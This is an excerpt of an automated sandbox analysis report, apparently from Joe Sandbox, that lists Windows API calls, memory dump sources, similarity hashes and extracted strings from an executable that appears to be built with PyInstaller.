                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA47BB0: GetLastError.KERNEL32 ref: 00007FF6ABA47C12
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA47BB0: GetTokenInformation.KERNELBASE ref: 00007FF6ABA47C52
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA47BB0: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6ABA47C6E
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA47BB0: CloseHandle.KERNEL32 ref: 00007FF6ABA47C86
                                                                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00007FF6ABA43099), ref: 00007FF6ABA4864C
                                                                                                                                                                                                                                                        • LocalFree.KERNEL32 ref: 00007FF6ABA48655
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
• Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                        • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                                        • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CreateDirectoryW.KERNELBASE(00000000,?,00007FF6ABA428EC,FFFFFFFF,00000000,00007FF6ABA4336A), ref: 00007FF6ABA47372
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
• Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CreateDirectory
                                                                                                                                                                                                                                                        • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                                        • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6ABA5DE4B), ref: 00007FF6ABA5DF7C
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6ABA5DE4B), ref: 00007FF6ABA5E007
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
• Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 953036326-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
• Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 4170891091-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2780335769-0
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1279662727-0
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1703294689-0
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1236291503-0
Similarity
• API ID: FileHandleType
• String ID:
• API String ID: 3000768030-0
APIs
• SetFilePointerEx.KERNELBASE(?,?,?,?,?,00007FF6ABA5D020,?,?,?,?,?,00007FF6ABA5D129), ref: 00007FF6ABA5D080
• GetLastError.KERNEL32(?,?,?,?,?,00007FF6ABA5D020,?,?,?,?,?,00007FF6ABA5D129), ref: 00007FF6ABA5D08A
Memory Dump Source
• Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
APIs
• FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6ABA567F5), ref: 00007FF6ABA56913
• SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6ABA567F5), ref: 00007FF6ABA56929
Memory Dump Source
• Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
Similarity
• API ID: Time$System$FileLocalSpecific
• String ID:
• API String ID: 1707611234-0
APIs
• RtlFreeHeap.NTDLL(?,?,?,00007FF6ABA63F92,?,?,?,00007FF6ABA63FCF,?,?,00000000,00007FF6ABA64495,?,?,?,00007FF6ABA643C7), ref: 00007FF6ABA5B47A
• GetLastError.KERNEL32(?,?,?,00007FF6ABA63F92,?,?,?,00007FF6ABA63FCF,?,?,00000000,00007FF6ABA64495,?,?,?,00007FF6ABA643C7), ref: 00007FF6ABA5B484
Memory Dump Source
• Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
Similarity
• API ID: ErrorFreeHeapLast
• String ID:
• API String ID: 485612231-0
APIs
• CloseHandle.KERNELBASE(?,?,?,00007FF6ABA5B8DD,?,?,00000000,00007FF6ABA5B992), ref: 00007FF6ABA5BACE
• GetLastError.KERNEL32(?,?,?,00007FF6ABA5B8DD,?,?,00000000,00007FF6ABA5B992), ref: 00007FF6ABA5BAD8
Memory Dump Source
• Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
Similarity
• API ID: CloseErrorHandleLast
• String ID:
• API String ID: 918212764-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
• Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _fread_nolock
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 840049012-0
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3947729631-0
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: 705a0604598582430d769309be7d52bb613e0b4e097a3a0cc12fb03a34ef158b
                                                                                                                                                                                                                                                        • Instruction ID: da86c2929f9f08e214f5993817a9bd6c2ab151f9048ec4c553382e3c5258a46a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 705a0604598582430d769309be7d52bb613e0b4e097a3a0cc12fb03a34ef158b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5121A772629A8287DB618F2CE45037976A2FB98B94F544234EB5DC76E6EF3DD4408B00
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
• Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
• Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF6ABA4C3F0
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA4CE18: __vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FF6ABA4CE20
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA4CE18: __vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00007FF6ABA4CE25
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
• Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: __scrt_dllmain_crt_thread_attach__vcrt_uninitialize_locks__vcrt_uninitialize_ptd
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1208906642-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
• Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(?,?,00000000,00007FF6ABA5C22A,?,?,?,00007FF6ABA55E51,?,?,?,?,00007FF6ABA5B392), ref: 00007FF6ABA5FE59
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
• Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AllocHeap
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 4292702814-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(?,?,?,00007FF6ABA50268,?,?,?,00007FF6ABA518D2,?,?,?,?,?,00007FF6ABA54595), ref: 00007FF6ABA5E702
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
• Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AllocHeap
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 4292702814-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                                        • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                                        • API String ID: 199729137-653951865
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                                                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                        • API String ID: 808467561-2761157908
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                                                                                                                                                                                        • API String ID: 0-2665694366
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3140674995-0
                                                                                                                                                                                                                                                        • Opcode ID: 89357c2c4ffda8ae13225540be7c458f51fcd4783b393db7419e501aec0a0031
                                                                                                                                                                                                                                                        • Instruction ID: 6bbb4984bc3c55c8e4d9ba4909d8044f49803b9e29df7d3f5df9fdad7fb7f2f4
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 89357c2c4ffda8ae13225540be7c458f51fcd4783b393db7419e501aec0a0031
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FE314372606B8186EB609F65E8507ED7364FB88744F44403ADB4D87BA4FF78D558C710
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
• Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1239891234-0
                                                                                                                                                                                                                                                        • Opcode ID: 2c2a6f2487acec397f330098253e2a7329acffa396285c7b3dfee245a17751bc
                                                                                                                                                                                                                                                        • Instruction ID: baacca20c378803ebd71a9cc28592a86710942b9f65e8817c04a011a45a7d430
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2c2a6f2487acec397f330098253e2a7329acffa396285c7b3dfee245a17751bc
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 16317476609F8186DB60CF25E8502AD73A4FB88794F540136EB9D83B64EF3CC155CB00
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
• Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2227656907-0
                                                                                                                                                                                                                                                        • Opcode ID: ccac9e585c27fa031d1f88e05c20b38684cf4203d2ca8c6846fc05bcbc68a6e8
                                                                                                                                                                                                                                                        • Instruction ID: 497625fdb7fb4e79ccd218e28cb86cab66e3c9f8d5734fcc2c0cd9abf0d31e50
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ccac9e585c27fa031d1f88e05c20b38684cf4203d2ca8c6846fc05bcbc68a6e8
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2BB1B7A2B1A79281EE609F2994202B9A751EB48BD4F444132DF5F87BE5FE3CE845C300
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
• Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
